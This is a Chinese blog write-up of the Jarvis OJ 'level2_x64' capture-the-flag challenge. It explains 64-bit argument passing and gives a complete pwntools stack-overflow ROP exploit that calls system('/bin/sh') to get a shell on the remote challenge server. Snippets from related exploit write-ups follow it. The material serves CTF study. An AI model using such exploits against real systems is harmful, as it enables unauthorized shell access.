CTF-PWN-level2(x64)(Jarvis OJ)

最新推荐文章于 2022-07-07 22:29:43 发布
最新推荐文章于 2022-07-07 22:29:43 发布
阅读量506 收藏
点赞数
分类专栏: CTF-PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/getsum/article/details/87378542
版权

这道题和level2的32位版本的漏洞一样,不过32位程序函数的参数是压在栈中的,而64位程序的前6个参数是存在寄存器中的,第7个开始才压入栈中。

由于我们的目的是将system函数的参数改为/bin/sh,所以我们考虑用pop edi ret 语句将字符串赋值给edi。

同样的,程序中hint存入了/bin/sh,我们直接使用即可。

system函数的地址也很容易获得,剩下的就是pop edi命令的地址。使用如下命令:

ROPgadget --binary level2_x64 --only "pop|ret"|grep rdi

获得其地址,以下为exp

from pwn import *
context(os='linux',arch='i386',log_level='debug')
#p=process('./level2')
p=remote('pwn2.jarvisoj.com',9882)
p.recvline()
bin_adr=0x600A90
sys_adr=0x40063E
popedi_adr=0x4006b3
payload='A'*0x88+p64(popedi_adr)+p64(bin_adr)+p64(sys_adr)
p.send(payload)
p.interactive()

 

SuperGate
关注
专栏目录
[CTF-PWN]攻防世界新手村-level2[wp]
murongxuege的博客
10-04 675
事件起因(无语) 手残博主因在27日从根地址误删了自己两年半配置和使用的kali虚拟机。。。在一步步恢复环境配置的时候,从头到尾刷一遍题,总结思路。 题目分析 开启场景后,服务端会开启对应的端口,并在端口上部署和附件相同的ELF二进制可执行文件,我们要做的就是下载附件并在本地进行反汇编,反编译等操作分析程序漏洞,从而利用漏洞获取题目的flag。 checksec监测 file查看一下文件属性,可以看到文件是linux elf文件,32字节,Inter80386微处理器。 checksec的常用命令是:c
Jarvis OJ-PWN
weixin_45461609的博客
08-08 255
pwnTest_Your_Memory Test_Your_Memory 题目名字和题目没啥关系,真·一点关系也没有。 提供了system()函数 并且在mem_test函数中的输出hint的地址,hint地址内容为cat flag。 所以只需要将返回地址改成system()所在的地址,并将hint的地址传给system就能执行cat flag命令。 from pwn import * r=remote('pwn2.jarvisoj.com',9876) e=ELF('./memory') sys_a
PWN_JarvisOJ_Level2_x64
michaelinfinity的博客
03-16 1433
关于level2我就不多做赘述了。这道题和level2之间的区别就是一个是32位的栈溢出,另一个就是64位的栈溢出。 32位的函数在调用栈的时候是: 调用函数地址->函数的返回地址->参数n->参数n-1....->参数1 64位的函数在调用栈的时候是: 前六个参数按照约定存储在寄存器:rdi,rsi,rdx,rcx,r8,r9中。 ...
CTF PWN [XMAN]level2(x64)
qq_41743240的博客
04-08 423
CTF PWN [XMAN]level2(x64) 题目地址 首先进行checksec保护机制的查询 发现只开了NX,所以不能利用shellcode方式获取shell,这里采用ROP方式获取shell IDA反编译查看伪源码 程序非常简单,两个函数 main: vulnerable_function: 在vulnerable_function有个问题,buf申请空间为0x80字节,然而可以读...
[BUUCTF]PWN——jarvisoj_level2_x64
BangSen1的博客
03-30 1395
jarvisoj_level2_x64 例行检查 ,64位,开启NX保护, 运行一下 用IDA打开。 systemaddr=0x40063e shalladdr=0x400A90 查看主函数,buf的长度为0x80,读取的长度为0x200,可以造成溢出漏洞。 rdiaddr= 0x4006b3 from pwn import * context(log_level = 'debug') elf = ELF('./level2_x64') p = remote('node3.buuoj.cn',
XCTF pwn level2
weixin_46128614的博客
02-03 398
使用ida打开发现buf只有0x88,但是读取了0x100,存在溢出点 然后存在system函数和字符/bin/sh 有一点不太懂,选的是_system的地址,而不是system的地址,看了师傅的wp好像是这题的system函数申明了一个外部近指针,没有内容,不太明白 然后就是构造payload payload=“a”*(0x88+0x4)+p32(sys_addr)+p32(0)+p32...
CTF pwn -- ARM架构的pwn题详解
lifanxin的博客
05-14 2945
arm架构的pwn题详解概述环境搭建使用QEMU使用gdb-multiarchARM架构基本知识一道例题参考博客总结 概述   ARM架构过去称作进阶精简指令集机器(Advanced RISC Machine,更早称作:Acorn RISC Machine),是一个32位精简指令集(RISC)处理器架构,其广泛地使用在许多嵌入式系统设计。由于节能的特点,ARM处理器非常适用于移动通讯领域,符合其主要设计目标为低耗电的特性。因此我们常用的手机、平板等移动设备都是采用ARM体系架构的,因此CTF中不可避免也会出
Jarvis OJ--level3
Kni9hT's Blog
11-10 250
要点:通过read()的溢出构造rop链,获得write()函数的真实地址,再利用libc的偏移算出system和“/bin/sh”的地址,再次利用write()溢出,执行system,就能得到shell。 添加链接描述 flag: CTF{d85346df5770f56f69025bc3f5f1d3d0} ...
Jarvis OJ --level4
Kni9hT's Blog
11-11 250
level4与level1、2、3的区别在于:无system、无"/bin/sh"、无libc 要点:使用DynELF函数leak system函数真实地址,然后用read函数写"/bin/sh\x00"到bss段,然后调用system("/bin/sh")去getshell。 题目链接: level4.0f9cfa0b7bb6c0f9e030a5541b46e9f0 先查看开了哪些保护: 和l...
CTF比赛PWN题sgtlibc通用快速解题框架
serfend's blog
07-07 1626
开源地址:https://github.com/serfend/sgtlibc使用 安装pwn解题框架例题:buuctf start system_bss_binsh_direct_x64 shellcode_orw_x86 例题:buuctf pwnable_orw libc-leak_x86_puts 例题:ctfshow ret2libc_64 内部赛_签到题 libc-leak_x86_write_pure 例题:buuctf jarvisoj_level1 libc-leak_x86_writ
XCTF PWN level2
prettyX的博客
06-10 252
查看基本信息 尝试运行 IDA F5 继续查看脆弱函数,88h的缓冲区可以写入0x100,发现溢出点 shift+F12,发现了“/bin/sh”
xctf pwn level2
weixin_64286326的博客
01-29 1008
前言:只能说是看着WP侥幸做出来了,里面很多不懂的地方. 1 分析 首先下载把环境附件整下来 在linux下打开,checksec 32位的,拖进ida 进去后汇编界面根本看不懂,F5查看伪代码 用linux运行也是这样 发现有一个vulnerable_function()函数,点进去看一下 我们可以看出来 栈顶和栈底相差0x88个字节,但是read()却是0x100个字节 r,s分别是返回地址和栈底。 既然这样,我们可以利用栈溢出来g...
[Jarvis OJ - PWN]——[XMAN]level2(x64)
Y_peak的博客
02-03 606
[Jarvis OJ - PWN]——[XMAN]level2(x64) 题目地址:https://www.jarvisoj.com/challenges 题目: checksec一下,是64位程序。开启了NX保护 在IDA看一下,main函数中有我们要的system函数, vulnerable_function函数中也有。不过可惜参数都不对,任取一个system地址就好就好。但是我们找到了栈溢出的利用函数read。buf距离rbp的距离为0x80 查找一下看看有没有**"/bin/sh"字符串
18.9.19 Jarvis OJ PWN----[XMAN]level2(x64)
qq_42192672的博客
09-19 315
先checksec一下 可以栈溢出,我们可以看到文件里有system函数,有/bin/sh字符串,美滋滋 64位函数的参数传递顺序和32位不同,传参顺序:rdi,rsi,rdx,rcx,r8,r9,栈,所以要把\bin\sh的地址放到rdi里 找一下可溢出的地方,在read函数里 关键点其实就是找出rdi地址(参考大佬的教学) 指令语句:ROPgadget --binary le...
XCTF-PWN-level2-WP
l2645470582_的博客
08-02 216
1、下载文件并开启靶机 2、在Linux中查看该文件信息 checksec 4 3、该文件是32位文件,用32位IDA打开该文件 3.1、shift+f12查看关键字符串 我们看到"/bin/sh"的地址为:x0804A024 3.2、双击关键字符串,按Ctrl+x,再f5进入main函数的反汇编代码 3.3、我们看到关键函数vulnerable_function(),双击进入 3.4、我们看到buf溢出,双击buf查看字符串 buf:0x88...
pwn2_64
m0_49959202的博客
09-18 117
文章目录pwn2_641.程序分析2.栈帧设计3.exp编写 pwn2_64 1.程序分析 本题和上一题一样,但是是64位的,那么就需要改变传参的方式:当参数少于7个时, 参数从左到右放入寄存器: rdi, rsi, rdx, rcx, r8, r9 那么就需要使用rop先把需要的参数“/bin/sh”传入rdi。 2.栈帧设计 3.exp编写 from pwn import * context(log_level = 'debug', arch = 'amd64', os = 'linux') io
buuctf|pwn-jarvisoj_level2_x64-wp
l2645470582_的博客
11-08 457
1.例行检查保护机制 只开启了堆保护 2.我们用64位的IDA查看该文件 shift+f12查看关键字符串,我们看到关键字符串“/bin/sh” 我们双击“/bin/sh”,bin/sh的地址为:0x0600A90 3.查看main函数里面的内容 进入vulnerable_function()函数 我们看到buf只有0x80个字节,但是下面read()里面读取了0x200个,这里造成了溢出 4.system("/bin/sh")才能拿到权限 我们找...
jarvisoj_level2_x64
、moddemod
06-17 539
exp #!/usr/bin/env python3 # coding=utf-8 from pwn import * context(log_level = 'debug') proc_name = './level2_x64' p =process(proc_name) p = remote('node3.buuoj.cn', 25838) elf = ELF(proc_name) system_addr = elf.sym['system'] bin_sh_str = 0x600a90 pop..
level2 [XCTF-PWN]CTF writeup系列6
重新启程
12-19 609
题目地址:level2 先看看题目内容: 照例下载文件,检查一下保护机制 root@mypwn:/ctf/work/python# checksec 15bc0349874045ba84bb6e504e910a46 [*] '/ctf/work/python/15bc0349874045ba84bb6e504e910a46' Arch: i386-32-little ...
ctfd-pwn赛题收集
最新发布
10-23
ctfd-pwn是一个非常受欢迎的CTF(Capture The Flag)比赛中的一个赛题类型,它主要涉及二进制漏洞的利用和系统安全的挑战。 在ctfd-pwn赛题的收集过程中,通常需要考虑以下几个方面: 1. 题目类型:ctfd-pwn赛题...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值